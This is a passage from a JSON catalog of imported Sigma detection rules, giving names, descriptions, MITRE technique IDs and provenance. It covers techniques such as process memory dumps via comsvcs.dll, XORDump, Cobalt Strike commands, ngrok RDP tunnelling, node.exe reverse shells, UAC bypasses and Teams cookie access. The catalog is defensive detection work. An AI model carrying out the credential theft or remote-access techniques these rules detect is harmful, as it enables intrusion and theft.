"source": "SigmaHQ/sigma", "source_id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbghelp.yml" } }, { "id": "sigmahq-sigma-6419afd1-3742-47a5-a7e6-b50386cd15f8", "type": "detection", "name": "Chmod Targeting Sensitive Directories", "description": "Detects chmod targeting files in sensitive directory paths on Linux systems.\nAttackers may 
use chmod to change permissions of files in these directories to maintain persistence, escalate privileges, or disrupt system operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chmod-targeting-sensitive-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chmod_targeting_sensitive_directories.yml" } }, { "id": "sigmahq-sigma-641a4bfb-c017-44f7-800c-2aee0184ce9b", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - System", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml" } }, { "id": "sigmahq-sigma-643bdcac-8b82-49f4-9fd9-25a90b929f3b", "type": "detection", "name": "Renamed MegaSync Execution", "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-megasync-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" } }, { "id": "sigmahq-sigma-645fd80d-6c07-435b-9e06-7bc1b5656cba", "type": "detection", "name": "Roles Activated Too Frequently", "description": "Identifies when the same privilege role has multiple activations by the same user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-activated-too-frequently.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "645fd80d-6c07-435b-9e06-7bc1b5656cba", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml" } }, { "id": "sigmahq-sigma-646bc99f-6682-4b47-a73a-17b1b64c9d34", "type": "detection", "name": "Execute Files with Msdeploy.exe", "description": "Detects file execution using the msdeploy.exe lolbin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-files-with-msdeploy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" } }, { "id": "sigmahq-sigma-646ea171-dded-4578-8a4d-65e9822892e3", "type": "detection", "name": "Process Memory Dump Via Comsvcs.DLL", "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "646ea171-dded-4578-8a4d-65e9822892e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" } }, { "id": "sigmahq-sigma-64760eef-87f7-4ed3-93fd-655668ea9420", "type": "detection", "name": "Use of Scriptrunner.exe", "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-scriptrunner-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64760eef-87f7-4ed3-93fd-655668ea9420", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" } }, { "id": "sigmahq-sigma-647c7b9e-d784-4fda-b9a0-45c565a7b729", "type": "detection", "name": "Operator Bloopers Cobalt Strike Commands", "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/operator-bloopers-cobalt-strike-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" } }, { "id": "sigmahq-sigma-64d51a51-32a6-49f0-9f3d-17e34d640272", "type": "detection", "name": "Ngrok Usage with Remote Desktop Service", "description": "Detects cases in which ngrok, a reverse tunnelling tool, forwards inbound connections to the local RDP port, which could be a sign of malicious remote access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ngrok-usage-with-remote-desktop-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" } }, { "id": "sigmahq-sigma-64e8e417-c19a-475a-8d19-98ea705394cc", "type": "detection", "name": "Alternate PowerShell Hosts - PowerShell Module", "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/alternate-powershell-hosts-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "64e8e417-c19a-475a-8d19-98ea705394cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" } }, { "id": "sigmahq-sigma-651f87f7-12db-47f9-84c5-f27b081b94b6", "type": "detection", "name": "RegAsm.EXE Execution Without CommandLine Flags or Files", "description": "Detects the execution of \"RegAsm.exe\" without a commandline flag or file, which might indicate potential process injection activity.\nUsually \"RegAsm.exe\" should point to a dedicated DLL file or call the help with the \"/?\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regasm-exe-execution-without-commandline-flags-or-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "651f87f7-12db-47f9-84c5-f27b081b94b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_no_flag_or_dll_execution.yml" } }, { 
"id": "sigmahq-sigma-65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "type": "detection", "name": "EVTX Created In Uncommon Location", "description": "Detects the creation of new files with the \".evtx\" extension in non-common or non-standard location.\nThis could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.\nNote that backup software and legitimate administrator might perform similar actions during troubleshooting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/evtx-created-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" } }, { "id": "sigmahq-sigma-652c098d-dc11-4ba6-8566-c20e89042f2b", "type": "detection", "name": "User Added To Admin Group Via Sysadminctl", "description": "Detects attempts to create and add an account to the admin group via \"sysadminctl\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-sysadminctl.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "652c098d-dc11-4ba6-8566-c20e89042f2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" } }, { "id": "sigmahq-sigma-65354b83-a2ea-4ea6-8414-3ab38be0d409", "type": "detection", "name": "Cross Site Scripting Strings", "description": "Detects XSS attempts injected via GET requests in access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1189" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cross-site-scripting-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_xss_in_access_logs.yml" } }, { "id": "sigmahq-sigma-654fcc6d-840d-4844-9b07-2c3300e54a26", "type": "detection", "name": "Legitimate Application Dropped Archive", "description": "Detects programs on a Windows system that should not write an archive to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/legitimate-application-dropped-archive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml" } }, { "id": "sigmahq-sigma-6555754e-5e7f-4a67-ad1c-4041c413a007", "type": "detection", "name": "Anomalous Token", "description": "Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anomalous-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6555754e-5e7f-4a67-ad1c-4041c413a007", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" } }, { "id": "sigmahq-sigma-65744385-8541-44a6-8630-ffc824d7d4cc", "type": "detection", "name": "Microsoft Teams Sensitive File Access By Uncommon Applications", "description": "Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-teams-sensitive-file-access-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65744385-8541-44a6-8630-ffc824d7d4cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml" } }, { "id": "sigmahq-sigma-6597be7b-ac61-4ac8-bef4-d3ec88174853", "type": "detection", "name": "UAC Bypass Abusing Winsat Path Parsing - Registry", "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-abusing-winsat-path-parsing-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" } }, { "id": "sigmahq-sigma-65c3ca2c-525f-4ced-968e-246a713d164f", "type": "detection", "name": "Visual Studio NodejsTools PressAnyKey Renamed Execution", "description": "Detects 
renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-nodejstools-pressanykey-renamed-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65c3ca2c-525f-4ced-968e-246a713d164f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml" } }, { "id": "sigmahq-sigma-65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "type": "detection", "name": "Potential Persistence Via PlistBuddy", "description": "Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.001", "T1543.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-plistbuddy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" } }, { "id": "sigmahq-sigma-65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "type": "detection", "name": "SharpHound Recon Account Discovery", "description": "Detects remote RPC calls used by SharpHound to map remote connections and local group membership.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sharphound-recon-account-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" } }, { "id": "sigmahq-sigma-6640f31c-01ad-49b5-beb5-83498a5cd8bd", "type": "detection", "name": "Potential Arbitrary Code Execution Via Node.EXE", "description": "Detects the execution of node.exe, which ships with multiple products such as VMware and Adobe software, in order to execute arbitrary code. 
For example, to establish a reverse shell as seen in Log4j exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-code-execution-via-node-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_node_abuse.yml" } }, { "id": "sigmahq-sigma-66474410-b883-415f-9f8d-75345a0a66a6", "type": "detection", "name": "DNS Query To MEGA Hosting Website - DNS Client", "description": "Detects DNS queries for subdomains of the MEGA file-sharing service (mega.nz)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-mega-hosting-website-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66474410-b883-415f-9f8d-75345a0a66a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml" } }, { "id": "sigmahq-sigma-665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "type": 
"detection", "name": "User Removed From Group With CA Policy Modification Access", "description": "Monitor and alert on the removal of a user from groups that have Conditional Access (CA) policy modification access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-removed-from-group-with-ca-policy-modification-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml" } }, { "id": "sigmahq-sigma-66a4d409-451b-4151-94f4-a55d559c49b0", "type": "detection", "name": "PowerShell Deleted Mounted Share", "description": "Detects when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-deleted-mounted-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66a4d409-451b-4151-94f4-a55d559c49b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" } }, { "id": "sigmahq-sigma-66b6be3d-55d0-4f47-9855-d69df21740ea", "type": "detection", "name": "Local User Creation", "description": "Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your Windows server logs and not on your DC logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66b6be3d-55d0-4f47-9855-d69df21740ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_creation.yml" } }, { "id": "sigmahq-sigma-66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "type": "detection", "name": "Potential Crypto Mining Activity", "description": "Detects command line parameters or strings often used by crypto miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-crypto-mining-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml" } }, { "id": "sigmahq-sigma-66d31e5f-52d6-40a4-9615-002d3789a119", "type": "detection", "name": "Remote Thread Creation By Uncommon Source Image", "description": "Detects uncommon processes creating remote threads.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-by-uncommon-source-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66d31e5f-52d6-40a4-9615-002d3789a119", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml" } }, { "id": "sigmahq-sigma-66e563f9-1cbd-4a22-a957-d8b7c0f44372", "type": "detection", "name": "HackTool - XORDump Execution", "description": "Detects suspicious use of XORDump process memory dumping utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-xordump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_xordump.yml" } }, { "id": "sigmahq-sigma-671ffc77-50a7-464f-9e3d-9ea2b493b26b", "type": "detection", "name": "Cisco Modify Configuration", "description": 
"Detects modifications to a Cisco device configuration that could serve an adversary's impact or persistence goals", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490", "T1505", "T1565.002", "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-modify-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_modify_config.yml" } }, { "id": "sigmahq-sigma-674202d0-b22a-4af4-ae5f-2eda1f3da1af", "type": "detection", "name": "Bypass UAC Using Event Viewer", "description": "Detects a User Account Control bypass using Event Viewer (eventvwr.exe) and the associated Windows Registry modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 